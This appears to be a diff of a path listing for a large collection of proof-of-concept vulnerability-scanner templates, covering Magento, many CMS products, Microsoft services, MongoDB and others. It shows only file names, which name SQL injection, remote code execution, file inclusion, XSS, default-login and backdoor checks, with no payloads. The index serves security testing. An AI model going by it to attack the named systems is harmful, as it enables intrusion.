@@ ./poc/magento/magento-2-exposed-api-2.yaml ./poc/magento/magento-2-exposed-api-3.yaml ./poc/magento/magento-2-exposed-api-8687.yaml +./poc/magento/magento-2-exposed-api-8688.yaml ./poc/magento/magento-2-exposed-api-8689.yaml +./poc/magento/magento-admin-panel-8690.yaml ./poc/magento/magento-admin-panel-8691.yaml -./poc/magento/magento-admin-panel-8692.yaml ./poc/magento/magento-admin-panel-8693.yaml ./poc/magento/magento-admin-panel-8694.yaml ./poc/magento/magento-admin-panel-8695.yaml @@ -49942,13 +49918,11 @@ ./poc/magento/magento-cacheleak-8696.yaml ./poc/magento/magento-cacheleak-8697.yaml ./poc/magento/magento-cacheleak-8698.yaml -./poc/magento/magento-cacheleak-8699.yaml ./poc/magento/magento-config-1.yaml ./poc/magento/magento-config-2.yaml ./poc/magento/magento-config-8700.yaml ./poc/magento/magento-config-8701.yaml ./poc/magento/magento-config-8703.yaml -./poc/magento/magento-config-disclosure.yaml ./poc/magento/magento-config.yaml ./poc/magento/magento-detect-1.yaml ./poc/magento/magento-detect-2.yaml 
@@ -49982,11 +49956,11 @@ ./poc/microsoft/74cms-show-sqli.yaml ./poc/microsoft/74cms-sqli-1.yaml ./poc/microsoft/74cms-sqli-1.yml -./poc/microsoft/74cms-sqli-10.yaml ./poc/microsoft/74cms-sqli-2.yaml ./poc/microsoft/74cms-sqli-2.yml ./poc/microsoft/74cms-sqli-8.yaml ./poc/microsoft/74cms-sqli-9.yaml +./poc/microsoft/74cms-sqli.yaml ./poc/microsoft/74cms-sqli.yml ./poc/microsoft/74cms-v3-Boolean-injection.yaml ./poc/microsoft/74cms-workflow.yaml @@ -50105,11 +50079,13 @@ ./poc/microsoft/aikcms_v2-poster-editphp-time-blind.yaml ./poc/microsoft/aikcms_v2-xss.yaml ./poc/microsoft/aikcms_v2_notice_edit_sqli.yaml -./poc/microsoft/aims-password-mgmt-client-218.yaml +./poc/microsoft/aims-password-mgmt-client-219.yaml ./poc/microsoft/aims-password-mgmt-client-220.yaml +./poc/microsoft/aims-password-mgmt-client-221.yaml ./poc/microsoft/aims-password-mgmt-client.yaml ./poc/microsoft/aims-password-portal-222.yaml ./poc/microsoft/aims-password-portal-223.yaml +./poc/microsoft/aims-password-portal-225.yaml ./poc/microsoft/aims-password-portal.yaml ./poc/microsoft/alibaba-group-dms.yaml ./poc/microsoft/anecms.yaml @@ -50167,10 +50143,8 @@ ./poc/microsoft/beescms_v4-login-sqli.yaml ./poc/microsoft/bems-api-lfi-707.yaml ./poc/microsoft/bems-api-lfi-708.yaml -./poc/microsoft/bems-api-lfi-709.yaml ./poc/microsoft/bems-api-lfi-710.yaml ./poc/microsoft/bems-api-lfi-711.yaml -./poc/microsoft/bems-api-lfi-712.yaml ./poc/microsoft/bentley-systems-projectwise.yaml ./poc/microsoft/bio-lims.yaml ./poc/microsoft/block-styler-for-gravity-forms-322a86f28cc5049106653fa64c408640.yaml @@ -50181,7 +50155,7 @@ ./poc/microsoft/bolt-cms-detect-760.yaml ./poc/microsoft/bolt-cms-detect.yaml ./poc/microsoft/bolt-cms-panel-761.yaml -./poc/microsoft/bolt-cms-panel-762.yaml +./poc/microsoft/bolt-cms-panel-763.yaml ./poc/microsoft/bolt-cms-panel.yaml ./poc/microsoft/booking-sms-6e9ad46ba7b82908596d92a906a7c328.yaml ./poc/microsoft/booking-sms-d025c95ce85de2f4cfa3bfa54af8279c.yaml 
@@ -50272,8 +50246,8 @@ ./poc/microsoft/caldera-forms-pro-plugin.yaml ./poc/microsoft/caldera-forms-pro.yaml ./poc/microsoft/caldera-forms.yaml +./poc/microsoft/call-break-cms-838.yaml ./poc/microsoft/call-break-cms-839.yaml -./poc/microsoft/call-break-cms-840.yaml ./poc/microsoft/call-break-cms.yaml ./poc/microsoft/cforms-864aa2a30cb2aac523a91326f7cc90dc.yaml ./poc/microsoft/cforms-c00364338071c029d11801e6d6d843db.yaml @@ -50298,15 +50272,15 @@ ./poc/microsoft/chamilo-lms-sqli-1.yaml ./poc/microsoft/chamilo-lms-sqli-2.yaml ./poc/microsoft/chamilo-lms-sqli-891.yaml -./poc/microsoft/chamilo-lms-sqli-892.yaml +./poc/microsoft/chamilo-lms-sqli.yaml ./poc/microsoft/chamilo-lms-xss-893.yaml ./poc/microsoft/chamilo-lms-xss-894.yaml ./poc/microsoft/chamilo-lms-xss.yaml ./poc/microsoft/chanzhicms.yaml ./poc/microsoft/chronoforms-3c97c9a74c23d051ec22745b993978f5.yaml ./poc/microsoft/chronoforms.yaml +./poc/microsoft/cisco-systems-login-973.yaml ./poc/microsoft/cisco-systems-login-974.yaml -./poc/microsoft/cisco-systems-login-975.yaml ./poc/microsoft/cisco-systems-login.yaml ./poc/microsoft/cluevo-lms-6a1d6ebcef69edeed5f796acb8a5f731.yaml ./poc/microsoft/cluevo-lms-78892043fdf34c1dee70d29718c1a4c1.yaml @@ -50389,7 +50363,6 @@ ./poc/microsoft/couchcms-cve-2018-7662.yml ./poc/microsoft/craft-cms-detect-1246.yaml ./poc/microsoft/craft-cms-detect-1247.yaml -./poc/microsoft/craft-cms-detect.yaml ./poc/microsoft/craftcms-admin-panel.yaml ./poc/microsoft/craftcms-seomatic-cve-2020-9757-rce.yml ./poc/microsoft/craftercms-detect.yaml 
@@ -50446,17 +50419,18 @@ ./poc/microsoft/decon-wp-sms-17d0e92e2b742bf4ba974f8caec96975.yaml ./poc/microsoft/decon-wp-sms.yaml ./poc/microsoft/dede-cms-radminpass-disclosure.yaml -./poc/microsoft/dedecms-carbuyaction-fileinclude-6792.yaml ./poc/microsoft/dedecms-carbuyaction-fileinclude-6793.yaml +./poc/microsoft/dedecms-carbuyaction-fileinclude-6794.yaml +./poc/microsoft/dedecms-carbuyaction-fileinclude.yaml ./poc/microsoft/dedecms-carbuyaction-fileinclude.yml ./poc/microsoft/dedecms-cve-2018-6910.yml ./poc/microsoft/dedecms-cve-2018-7700-rce.yml ./poc/microsoft/dedecms-guestbook-sqli.yaml ./poc/microsoft/dedecms-guestbook-sqli.yml +./poc/microsoft/dedecms-membergroup-sqli-6796.yaml ./poc/microsoft/dedecms-membergroup-sqli-6797.yaml ./poc/microsoft/dedecms-membergroup-sqli-6798.yaml ./poc/microsoft/dedecms-membergroup-sqli-6799.yaml -./poc/microsoft/dedecms-membergroup-sqli.yaml ./poc/microsoft/dedecms-membergroup-sqli.yml ./poc/microsoft/dedecms-openredirect-6800.yaml ./poc/microsoft/dedecms-openredirect-6801.yaml @@ -50484,12 +50458,11 @@ ./poc/microsoft/dnatools-dnalims.yaml ./poc/microsoft/doccms.yaml ./poc/microsoft/docebolms.yaml -./poc/microsoft/dotcms-admin-panel-7085.yaml ./poc/microsoft/dotcms-admin-panel-7086.yaml +./poc/microsoft/dotcms-admin-panel-7087.yaml ./poc/microsoft/dotcms-admin-panel.yaml ./poc/microsoft/dotcms-version-detect.yaml ./poc/microsoft/dotnetcms-sqli-7089.yaml -./poc/microsoft/dotnetcms-sqli.yaml ./poc/microsoft/dotnetcms-sqli.yml ./poc/microsoft/drupal_module-comscore_direct-cross-site-scripting.yaml ./poc/microsoft/drupal_module-config_perms-access-bypass.yaml 
@@ -50498,7 +50471,9 @@ ./poc/microsoft/drupal_module-spamspan-cross-site-scripting.yaml ./poc/microsoft/duomicms-sql-injection-7122.yaml ./poc/microsoft/duomicms-sql-injection-7123.yaml +./poc/microsoft/duomicms-sql-injection-7124.yaml ./poc/microsoft/duomicms-sql-injection-7125.yaml +./poc/microsoft/duomicms-sql-injection.yaml ./poc/microsoft/duomicms-sqli.yaml ./poc/microsoft/duomicms-sqli.yml ./poc/microsoft/duomicms-workflow.yaml @@ -50528,10 +50503,8 @@ ./poc/microsoft/emails-blacklist-everest-forms-6477bf18cad6c823db485408d49b337b.yaml ./poc/microsoft/emails-blacklist-everest-forms-ee9870d5bef0545dced6af21473d9057.yaml ./poc/microsoft/emails-blacklist-everest-forms.yaml +./poc/microsoft/empirecms-xss-7218.yaml ./poc/microsoft/empirecms-xss-7219.yaml -./poc/microsoft/empirecms-xss-7220.yaml -./poc/microsoft/empirecms-xss.yaml -./poc/microsoft/ems-login-panel-7223.yaml ./poc/microsoft/ems-login-panel-7224.yaml ./poc/microsoft/ems-login-panel-7225.yaml ./poc/microsoft/ems-login-panel.yaml @@ -50555,7 +50528,6 @@ ./poc/microsoft/feifeicms-lfr-7463.yaml ./poc/microsoft/feifeicms-lfr-7464.yaml ./poc/microsoft/feifeicms-lfr-7465.yaml -./poc/microsoft/feifeicms-lfr.yaml ./poc/microsoft/feifeicms-lfr.yml ./poc/microsoft/feifeicms-workflow.yaml ./poc/microsoft/feifeicms.yaml @@ -50674,7 +50646,6 @@ ./poc/microsoft/grav-cms-detect-7841.yaml ./poc/microsoft/grav-cms-detect-7842.yaml ./poc/microsoft/grav-cms-detect-7845.yaml -./poc/microsoft/grav-cms-detect.yaml ./poc/microsoft/gravcms.yaml ./poc/microsoft/gravity-forms-dps-pxpay-dc6fdd47b30188fa018518ba346c5e82.yaml ./poc/microsoft/gravity-forms-dps-pxpay.yaml 
@@ -50776,6 +50747,7 @@ ./poc/microsoft/integration-for-szamlazz-hu-gravity-forms-24a382814c11d242eafc70c9603f2da8.yaml ./poc/microsoft/integration-for-szamlazz-hu-gravity-forms.yaml ./poc/microsoft/ipec-ipms.yaml +./poc/microsoft/isams-panel.yaml ./poc/microsoft/jcms-panel.yaml ./poc/microsoft/jeecms.yaml ./poc/microsoft/jeewms-dynamicDataSourceController-rce.yaml @@ -50785,7 +50757,6 @@ ./poc/microsoft/jeewms-lfi-8253.yaml ./poc/microsoft/jeewms-lfi-8254.yaml ./poc/microsoft/jeewms-lfi-8255.yaml -./poc/microsoft/jeewms-lfi.yaml ./poc/microsoft/jeewms-privilege-bypass.yaml ./poc/microsoft/jeewms-showordownbyurl-fileread.yaml ./poc/microsoft/jeewms-showordownbyurl-fileread.yml @@ -50818,7 +50789,6 @@ ./poc/microsoft/kevinlab-bems-backdoor-8454.yaml ./poc/microsoft/kevinlab-bems-backdoor-8455.yaml ./poc/microsoft/kevinlab-bems-backdoor-8456.yaml -./poc/microsoft/kevinlab-bems-sqli-8457.yaml ./poc/microsoft/kevinlab-bems-sqli-8458.yaml ./poc/microsoft/kevinlab-bems-sqli-8459.yaml ./poc/microsoft/kevinlab-bems-sqli-8460.yaml @@ -50826,7 +50796,6 @@ ./poc/microsoft/kevinlab-hems-backdoor-8464.yaml ./poc/microsoft/kevinlab-hems-backdoor-8465.yaml ./poc/microsoft/kevinlab-hems-backdoor-8466.yaml -./poc/microsoft/kevinlab-hems-backdoor-8467.yaml ./poc/microsoft/kiwitcms-json-rpc.yaml ./poc/microsoft/kiwitcms-login-8496.yaml ./poc/microsoft/kiwitcms-login.yaml @@ -50862,8 +50831,8 @@ ./poc/microsoft/lotus-core-cms-lfi.yaml ./poc/microsoft/lotuscms-rce-1.yaml ./poc/microsoft/lotuscms-rce-2.yaml -./poc/microsoft/lotuscms-rce-8650.yaml ./poc/microsoft/lotuscms-rce-8651.yaml +./poc/microsoft/lotuscms-rce-8652.yaml ./poc/microsoft/lotuscms-rce-8653.yaml ./poc/microsoft/lws-sms-c00e7e76d8a521ccca85015413c6ff0e.yaml ./poc/microsoft/lws-sms-d41d8cd98f00b204e9800998ecf8427e.yaml 
@@ -50920,7 +50889,6 @@ ./poc/microsoft/menu-items-visibility-control-c141390b43c3b91c671992707f60ed21.yaml ./poc/microsoft/menu-items-visibility-control.yaml ./poc/microsoft/metatag-cms-8832.yaml -./poc/microsoft/metatag-cms-8833.yaml ./poc/microsoft/microsoft-advertising-universal-event-tracking-uet-f6e4d845703be6cb9b81a808ad73176e.yaml ./poc/microsoft/microsoft-advertising-universal-event-tracking-uet.yaml ./poc/microsoft/microsoft-azure-error.yaml @@ -50936,8 +50904,10 @@ ./poc/microsoft/microsoft-exchange-panel-8850.yaml ./poc/microsoft/microsoft-exchange-panel.yaml ./poc/microsoft/microsoft-exchange-server-detect-8852.yaml +./poc/microsoft/microsoft-exchange-server-detect-8853.yaml +./poc/microsoft/microsoft-exchange-server-detect-8854.yaml ./poc/microsoft/microsoft-exchange-server-detect.yaml -./poc/microsoft/microsoft-exchange-workflow-8855.yaml +./poc/microsoft/microsoft-exchange-workflow.yaml ./poc/microsoft/microsoft-exchange.yaml ./poc/microsoft/microsoft-ftp-service-detect.yaml ./poc/microsoft/microsoft-ftp-service.yaml @@ -50961,7 +50931,7 @@ ./poc/microsoft/mollie-forms-f0db812e51ae6400a634ecab5f82571a.yaml ./poc/microsoft/mollie-forms.yaml ./poc/microsoft/monstracms-detect.yaml -./poc/microsoft/ms-adcs-detect-8960.yaml +./poc/microsoft/ms-adcs-detect-8961.yaml ./poc/microsoft/ms-adcs-detect.yaml ./poc/microsoft/ms-exchange-server-reflected-xss-8962.yaml ./poc/microsoft/ms-exchange-server-reflected-xss-8963.yaml @@ -50991,6 +50961,7 @@ ./poc/microsoft/msmc-redirect-after-comment.yaml ./poc/microsoft/msmq-detect.yaml ./poc/microsoft/msmtp-config-8966.yaml +./poc/microsoft/msmtp-config-8967.yaml ./poc/microsoft/mspcontrol-login.yaml ./poc/microsoft/mssql-default-logins.yaml ./poc/microsoft/mssql-detect.yaml 
@@ -51031,17 +51002,15 @@ ./poc/microsoft/myfactory-fms-xss.yaml ./poc/microsoft/myucms-lfr-8983.yaml ./poc/microsoft/myucms-lfr-8984.yaml -./poc/microsoft/myucms-lfr-8985.yaml ./poc/microsoft/myucms-lfr-8986.yaml -./poc/microsoft/myucms-lfr-8987.yaml ./poc/microsoft/myucms-lfr.yml ./poc/microsoft/namaste-lms-119ec46f108a332aca6034c537083044.yaml ./poc/microsoft/namaste-lms-5a9d5217f7143833c2e6879ff9d010b1.yaml ./poc/microsoft/namaste-lms-9482e96ff87b6b144e3214e2145ccbb5.yaml ./poc/microsoft/namaste-lms-f3dd353da7150ac371daba104daa37d4.yaml ./poc/microsoft/namaste-lms.yaml -./poc/microsoft/netlify-cms-9039.yaml ./poc/microsoft/netlify-cms-9040.yaml +./poc/microsoft/netlify-cms-9041.yaml ./poc/microsoft/netlify-cms.yaml ./poc/microsoft/nex-forms-8ae2cf1fb5917fff39746f64c8df93f8.yaml ./poc/microsoft/nex-forms-express-wp-form-builder-03800489aeb5ec718d025ca048ebef5f.yaml @@ -51157,13 +51126,13 @@ ./poc/microsoft/nitc-cms.yaml ./poc/microsoft/normstar-hr.yaml ./poc/microsoft/nucleus-cms.yaml -./poc/microsoft/octobercms-default-login-9192.yaml ./poc/microsoft/octobercms-default-login-9193.yaml +./poc/microsoft/octobercms-default-login.yaml ./poc/microsoft/octobercms-detect-1.yaml ./poc/microsoft/octobercms-detect-2.yaml ./poc/microsoft/octobercms-detect-9194.yaml -./poc/microsoft/octobercms-detect-9195.yaml ./poc/microsoft/octobercms-detect-9196.yaml +./poc/microsoft/odoo-cms-redirect-9199.yaml ./poc/microsoft/odoo-cms-redirect-9200.yaml ./poc/microsoft/odoo-cms-redirect-9201.yaml ./poc/microsoft/official-mailerlite-sign-up-forms-2cfff66bdd973664a4a41739a9cfd162.yaml 
@@ -51190,14 +51159,15 @@ ./poc/microsoft/optin-forms.yaml ./poc/microsoft/orchid-vms-panel.yaml ./poc/microsoft/outsystems-servicecenter-panel.yaml -./poc/microsoft/pandora-fms-console-9451.yaml ./poc/microsoft/pandora-fms-console-9452.yaml +./poc/microsoft/pandora-fms-console-9453.yaml ./poc/microsoft/pandora-fms-console.yaml ./poc/microsoft/pandora-fms.yaml ./poc/microsoft/pandorafms-cve-2019-20224-rce.yml ./poc/microsoft/paraview-uams.yaml ./poc/microsoft/payment-forms-for-paystack-9e71ae11056f9c8a0f3c1bdcd525390c.yaml ./poc/microsoft/payment-forms-for-paystack.yaml +./poc/microsoft/pbootcms-database-file-download-9469.yaml ./poc/microsoft/pbootcms-database-file-download.yaml ./poc/microsoft/pbootcms-database-file-download.yml ./poc/microsoft/pbootcms-v3.1.2-rce.yaml @@ -51235,15 +51205,16 @@ ./poc/microsoft/planso-forms.yaml ./poc/microsoft/plone-cms-detect-9605.yaml ./poc/microsoft/plone-cms-detect-9606.yaml -./poc/microsoft/plone-cms-detect-9607.yaml +./poc/microsoft/plone-cms-detect-9608.yaml ./poc/microsoft/plone-cms-detect-9609.yaml -./poc/microsoft/plone-cms-detect.yaml ./poc/microsoft/power-cpms.yaml ./poc/microsoft/power-powerpms.yaml ./poc/microsoft/powercreator-cms-rce-9643.yaml ./poc/microsoft/powercreator-cms-rce-9644.yaml +./poc/microsoft/powercreator-cms-rce-9645.yaml ./poc/microsoft/powercreator-cms-rce-9646.yaml ./poc/microsoft/powercreator-cms-rce-9647.yaml +./poc/microsoft/powercreator-cms-rce.yaml ./poc/microsoft/powercreator-cms.yaml ./poc/microsoft/preamsolutions-inspection-and-modification-information-platform.yaml ./poc/microsoft/pro-chat-rooms.yaml @@ -51251,6 +51222,7 @@ ./poc/microsoft/qibocms-file-download.yaml ./poc/microsoft/qibocms-sqli.yaml ./poc/microsoft/qibocms-sqli.yml +./poc/microsoft/quick-cms-sqli.yaml ./poc/microsoft/quillforms-63ad11895eca4790d2308fe1895cd383.yaml ./poc/microsoft/quillforms-9a105b65f01831a6b723e0cb2ab1f154.yaml ./poc/microsoft/quillforms.yaml 
@@ -51260,13 +51232,14 @@ ./poc/microsoft/reflected-params.yaml ./poc/microsoft/rhymix-cms-detect-9876.yaml ./poc/microsoft/rhymix-cms-detect-9877.yaml +./poc/microsoft/rhymix-cms-detect-9878.yaml ./poc/microsoft/rhymix-cms-detect-9879.yaml ./poc/microsoft/rubygems-key.yaml ./poc/microsoft/ruoyi-cms-unauth.yaml ./poc/microsoft/s-cms.yaml ./poc/microsoft/saferoads-vms-login-9970.yaml -./poc/microsoft/saferoads-vms-login-9971.yaml ./poc/microsoft/saferoads-vms-login-9972.yaml +./poc/microsoft/saferoads-vms-login-9973.yaml ./poc/microsoft/saferoads-vms-login-9974.yaml ./poc/microsoft/saferoads-vms-login.yaml ./poc/microsoft/samsung-phish.yaml @@ -51278,12 +51251,12 @@ ./poc/microsoft/samsung-wea453e-rce.yml ./poc/microsoft/samsung-wlan-ap-default-credentials-9996.yaml ./poc/microsoft/samsung-wlan-ap-default-credentials.yaml +./poc/microsoft/samsung-wlan-ap-lfi-10000.yaml ./poc/microsoft/samsung-wlan-ap-lfi-10001.yaml ./poc/microsoft/samsung-wlan-ap-lfi-10002.yaml ./poc/microsoft/samsung-wlan-ap-lfi-10003.yaml ./poc/microsoft/samsung-wlan-ap-lfi-9997.yaml ./poc/microsoft/samsung-wlan-ap-lfi-9998.yaml -./poc/microsoft/samsung-wlan-ap-lfi-9999.yaml ./poc/microsoft/samsung-wlan-ap-rce-10004.yaml ./poc/microsoft/samsung-wlan-ap-rce-10005.yaml ./poc/microsoft/samsung-wlan-ap-rce-10006.yaml 
@@ -51294,12 +51267,13 @@ ./poc/microsoft/samsung-wlan-ap-wea453e-rce.yaml ./poc/microsoft/samsung-wlan-ap-wea453e-rce.yml ./poc/microsoft/samsung-wlan-ap-workflow-10011.yaml +./poc/microsoft/samsung-wlan-ap-xss-10012.yaml ./poc/microsoft/samsung-wlan-ap-xss-10013.yaml ./poc/microsoft/samsung-wlan-ap-xss-10014.yaml -./poc/microsoft/samsung-wlan-ap-xss.yaml ./poc/microsoft/samsung-wlan-default-login-10015.yaml ./poc/microsoft/samsung-wlan-default-login-10016.yaml ./poc/microsoft/samsung-wlan-default-login-10017.yaml +./poc/microsoft/samsung-wlan-default-login-10018.yaml ./poc/microsoft/sanshuichinatelecombusinesssupportroomsystem.yaml ./poc/microsoft/sdcms神盾内容管理系统.yaml ./poc/microsoft/seaCMS-sqli.yaml @@ -51307,9 +51281,11 @@ ./poc/microsoft/seacms-before-v992-rce.yml ./poc/microsoft/seacms-dmku-sqli.yaml ./poc/microsoft/seacms-rce-10100.yaml +./poc/microsoft/seacms-rce-10101.yaml ./poc/microsoft/seacms-rce-10102.yaml ./poc/microsoft/seacms-rce.yml ./poc/microsoft/seacms-sqli(1).yaml +./poc/microsoft/seacms-sqli-10103.yaml ./poc/microsoft/seacms-sqli.yml ./poc/microsoft/seacms-v101v11-comment-api-sqli.yaml ./poc/microsoft/seacms-v654-rce.yaml @@ -51326,6 +51302,7 @@ ./poc/microsoft/seeddms-default-password.yaml ./poc/microsoft/seeddms-detect-10129.yaml ./poc/microsoft/seeddms-detect-10130.yaml +./poc/microsoft/seeddms-detect-10131.yaml ./poc/microsoft/seeddms-detect.yaml ./poc/microsoft/seeddms-panel.yaml ./poc/microsoft/self-contained-with-params.yaml @@ -51333,7 +51310,6 @@ ./poc/microsoft/sensei-lms-85a373e82ccc10a34f197c7718aea84b.yaml ./poc/microsoft/sensei-lms-c63bf77b4673b1516933ee9dbc12c7ea.yaml ./poc/microsoft/sensei-lms.yaml -./poc/microsoft/sevone-nms-network-manager.yaml ./poc/microsoft/sfwd-lms-06323fb9edeca49ba23c68725457bd17.yaml ./poc/microsoft/sfwd-lms-1330b5fcba1aa18649be523fba98826e.yaml ./poc/microsoft/sfwd-lms-338d1aba9fbf1a2bc39d1d885f9dce3d.yaml 
@@ -51462,8 +51438,8 @@ ./poc/microsoft/textme-sms-integration.yaml ./poc/microsoft/tiki-wiki-cms.yaml ./poc/microsoft/tikiwiki-cms-1.yaml +./poc/microsoft/tikiwiki-cms-10773.yaml ./poc/microsoft/tikiwiki-cms-10774.yaml -./poc/microsoft/tikiwiki-cms-10775.yaml ./poc/microsoft/tikiwiki-cms-10776.yaml ./poc/microsoft/tikiwiki-cms-2.yaml ./poc/microsoft/tikiwiki-cms.yaml @@ -51471,8 +51447,8 @@ ./poc/microsoft/tinychat-roomspy.yaml ./poc/microsoft/tomatocms.yaml ./poc/microsoft/top-xss-params-10806.yaml +./poc/microsoft/top-xss-params-10807.yaml ./poc/microsoft/top-xss-params-10808.yaml -./poc/microsoft/top-xss-params-10809.yaml ./poc/microsoft/top-xss-params.yaml ./poc/microsoft/topper-nms.yaml ./poc/microsoft/torro-forms-32b2e2ff95bce6c610720879796f4bca.yaml @@ -51497,8 +51473,8 @@ ./poc/microsoft/views-for-wpforms-lite.yaml ./poc/microsoft/vospari-forms-e9bd69dbdf78833ce2843fc07cba7b74.yaml ./poc/microsoft/vospari-forms.yaml +./poc/microsoft/vpms-auth-bypass-11066.yaml ./poc/microsoft/vpms-auth-bypass-11067.yaml -./poc/microsoft/vpms-auth-bypass-11068.yaml ./poc/microsoft/vpms-auth-bypass-11069.yaml ./poc/microsoft/vpms-auth-bypass.yaml ./poc/microsoft/vts-cms.yaml @@ -51513,9 +51489,9 @@ ./poc/microsoft/weforms.yaml ./poc/microsoft/wems-enterprise-xss.yaml ./poc/microsoft/wems-manager-xss-11191.yaml +./poc/microsoft/wems-manager-xss-11192.yaml ./poc/microsoft/wems-manager-xss-11193.yaml ./poc/microsoft/wems-manager-xss-11194.yaml -./poc/microsoft/wems-manager-xss.yaml ./poc/microsoft/whfst-cms.yaml ./poc/microsoft/white-label-cms-1855568f250a52767f45b60ca73feade.yaml ./poc/microsoft/white-label-cms-21f790f886a508204a6d79b9c5155bc7.yaml 
@@ -51530,12 +51506,13 @@ ./poc/microsoft/white-label-cms-plugin.yaml ./poc/microsoft/white-label-cms.yaml ./poc/microsoft/wondercms-detect-11221.yaml +./poc/microsoft/wondercms-detect-11222.yaml ./poc/microsoft/wondercms-detect-11223.yaml -./poc/microsoft/wondercms-detect.yaml ./poc/microsoft/woocommerce-ninjaforms-product-addons-fe7479a6b6025e86397ca09e26459aa3.yaml ./poc/microsoft/woocommerce-ninjaforms-product-addons.yaml ./poc/microsoft/woosms-sms-module-for-woocommerce-15f567edca2252a2ec556aac3ef868ef.yaml ./poc/microsoft/woosms-sms-module-for-woocommerce.yaml +./poc/microsoft/wp-arforms-listing-11415.yaml ./poc/microsoft/wp-arforms-listing-11416.yaml ./poc/microsoft/wp-arforms-listing-11417.yaml ./poc/microsoft/wp-arforms-listing-11418.yaml @@ -51546,12 +51523,13 @@ ./poc/microsoft/wp-gravity-forms-spreadsheets-ce51e508f7b3ae4fa3cfc0e4f02b85ff.yaml ./poc/microsoft/wp-gravity-forms-spreadsheets-e2b56e01ba06c66b8d53d40581b73ce6.yaml ./poc/microsoft/wp-gravity-forms-spreadsheets.yaml +./poc/microsoft/wp-mstore-plugin-listing-11500.yaml ./poc/microsoft/wp-mstore-plugin-listing-11501.yaml ./poc/microsoft/wp-plugin-lifterlms-11533.yaml ./poc/microsoft/wp-plugin-lifterlms-11534.yaml ./poc/microsoft/wp-plugin-lifterlms-11536.yaml -./poc/microsoft/wp-sfwd-lms-listing-11562.yaml ./poc/microsoft/wp-sfwd-lms-listing-11563.yaml +./poc/microsoft/wp-sfwd-lms-listing-11564.yaml ./poc/microsoft/wp-sfwd-lms-listing-11565.yaml ./poc/microsoft/wp-shamsi-124603a63a010e84e51504af813f16d0.yaml ./poc/microsoft/wp-shamsi-d80212b26727fff04d47601179cd407f.yaml @@ -51656,7 +51634,9 @@ ./poc/microsoft/wq-cms.yaml ./poc/microsoft/wuzhicms-detect-11652.yaml ./poc/microsoft/wuzhicms-detect-11653.yaml +./poc/microsoft/wuzhicms-detect-11654.yaml ./poc/microsoft/wuzhicms-detect-11655.yaml +./poc/microsoft/wuzhicms-detect.yaml ./poc/microsoft/wuzhicms-sqli-11656.yaml ./poc/microsoft/wuzhicms-sqli-11657.yaml ./poc/microsoft/wuzhicms-sqli-11658.yaml 
@@ -51669,7 +51649,6 @@ ./poc/microsoft/x-forms-express.yaml ./poc/microsoft/xdcms-sql.yaml ./poc/microsoft/xdcms-sql.yml -./poc/microsoft/xdcms-sqli-11664.yaml ./poc/microsoft/xdcms-sqli-11665.yaml ./poc/microsoft/xdcms-sqli-11666.yaml ./poc/microsoft/xdcms-sqli-11667.yaml @@ -51696,7 +51675,6 @@ ./poc/microsoft/yzmcms-detect.yaml ./poc/microsoft/yzmcms-installer.yaml ./poc/microsoft/yzmcms-panel.yaml -./poc/microsoft/zcms-v3-sqli-11773.yaml ./poc/microsoft/zcms-v3-sqli-11774.yaml ./poc/microsoft/zcms-v3-sqli-11775.yaml ./poc/microsoft/zcms-v3-sqli.yaml @@ -51708,8 +51686,8 @@ ./poc/microsoft/zhixiangOA-msglog.aspx-sql.yaml ./poc/microsoft/zhuofansoft-cms.yaml ./poc/microsoft/zms-auth-bypass-11829.yaml +./poc/microsoft/zms-auth-bypass-11830.yaml ./poc/microsoft/zms-auth-bypass-11831.yaml -./poc/microsoft/zms-auth-bypass-11832.yaml ./poc/microsoft/zms-auth-bypass.yaml ./poc/microsoft/zoho-crm-forms-214f15a18793e7b424d313f7d9322ea1.yaml ./poc/microsoft/zoho-crm-forms-2b5679f874f417055036f384b6409e12.yaml @@ -51726,19 +51704,20 @@ ./poc/microsoft/zzzcms-workflow.yaml ./poc/microsoft/zzzcms-xss.yaml ./poc/microsoft/zzzcms.yaml +./poc/mongodb/alibaba-mongoshake-unauth-268.yaml ./poc/mongodb/alibaba-mongoshake-unauth-269.yaml ./poc/mongodb/alibaba-mongoshake-unauth-270.yaml ./poc/mongodb/dionaea-mongodb-honeypot-detection.yaml ./poc/mongodb/mongo-express-cve-2019-10758.yml ./poc/mongodb/mongo-express-web-gui.yaml ./poc/mongodb/mongodb-detect-8919.yaml +./poc/mongodb/mongodb-detect-8920.yaml ./poc/mongodb/mongodb-detect-8921.yaml ./poc/mongodb/mongodb-detect.yaml ./poc/mongodb/mongodb-info-enum.yaml ./poc/mongodb/mongodb-ops-manager-8923.yaml ./poc/mongodb/mongodb-ops-manager-8924.yaml ./poc/mongodb/mongodb-ops-manager.yaml -./poc/mongodb/mongodb-unauth-8925.yaml ./poc/mongodb/mongodb-unauth-8926.yaml ./poc/mongodb/mongodb-unauth-8927.yaml ./poc/mongodb/mongodb-unauth-8928.yaml 
@@ -51752,13 +51731,13 @@ ./poc/mongodb/robomongo.yaml ./poc/mongodb/rockmongo-default-credentials-9896.yaml ./poc/mongodb/rockmongo-default-credentials.yaml +./poc/mongodb/rockmongo-default-login-9897.yaml ./poc/mongodb/rockmongo-default-login-9898.yaml ./poc/mongodb/rockmongo-default-login-9899.yaml ./poc/mongodb/rockmongo-default-login-9900.yaml ./poc/mongodb/rockmongo-default-password.yaml ./poc/mongodb/rockmongo-default-password.yml ./poc/mongodb/rockmongo-xss-9901.yaml -./poc/mongodb/rockmongo-xss-9902.yaml ./poc/mongodb/rockmongo-xss-9903.yaml ./poc/mongodb/rockmongo-xss-9904.yaml ./poc/mongodb/unauthenticated-mongo-express-1.yaml @@ -51767,6 +51746,7 @@ ./poc/mongodb/unauthenticated-mongo-express-10910.yaml ./poc/mongodb/unauthenticated-mongo-express-10911.yaml ./poc/mongodb/unauthenticated-mongo-express-2.yaml +./poc/mongodb/unauthenticated-mongo-express.yaml ./poc/mysql/EOffice_mysql_config_information_leak.yaml ./poc/mysql/ScanMySQLiErrorBased.yaml ./poc/mysql/create-mysql-detection.yaml @@ -51793,14 +51773,15 @@ ./poc/mysql/seeyon-a6-createmysql-disclosure.yaml ./poc/mysql/seeyon-oa-a6-createmysql-infoleak.yaml ./poc/mysql/unrestricted-sg-ingress-mysql-port.yaml -./poc/netlify/api-netlify-470.yaml -./poc/netlify/netlify-cms-9039.yaml +./poc/netlify/api-netlify.yaml ./poc/netlify/netlify-cms-9040.yaml +./poc/netlify/netlify-cms-9041.yaml ./poc/netlify/netlify-cms.yaml ./poc/netlify/netlify-takeover-9042.yaml ./poc/netlify/netlify-takeover-9043.yaml ./poc/netlify/netlify-takeover.yaml ./poc/nginx/default-nginx-page-6880.yaml 